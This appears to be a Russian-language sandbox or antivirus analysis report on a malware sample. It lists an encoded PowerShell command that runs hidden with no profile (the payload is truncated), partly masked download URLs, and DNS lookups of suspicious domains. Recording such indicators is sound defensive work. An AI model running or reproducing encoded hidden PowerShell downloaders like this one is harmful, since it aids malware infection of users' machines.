Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JAB6AEIAMgB6AG0ASgBKAHUAPQAnAGQAYgBZAGoAbABqADcAJwA7ACQAZgB3AGoAegB6AFQAIAA9ACAAJwA3ADYAOQAnADsAJABhAFAAcwBIADcATABKAD0AJwBEAG0AUQBTAFoAVwBsACcAOwAkAHIAdABIAEQAVABKAEUANQA9ACQAZQBuAHYAO...
- 'te####lytrends.com':443
- http://co#####ordeviagens.com/errors/wGIkLEQS/
- http://www.co#####ordeviagens.com/errors/wGIkLEQS/
- http://98####orking.com/staging/QJgccUiXBC/
- DNS ASK ro###ini.com
- DNS ASK co#####ordeviagens.com
- DNS ASK do####mynghe.com
- DNS ASK 98####orking.com
- DNS ASK te####lytrends.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JAB6AEIAMgB6AG0ASgBKAHUAPQAnAGQAYgBZAGoAbABqADcAJwA7ACQAZgB3AGoAegB6AFQAIAA9ACAAJwA3ADYAOQAnADsAJABhAFAAcwBIADcATABKAD0AJwBEAG0AUQBTAFoAVwBsACcAOwAkAHIAdABIAEQAVABKAEUANQA9ACQAZQBuAHYAO...' (со скрытым окном)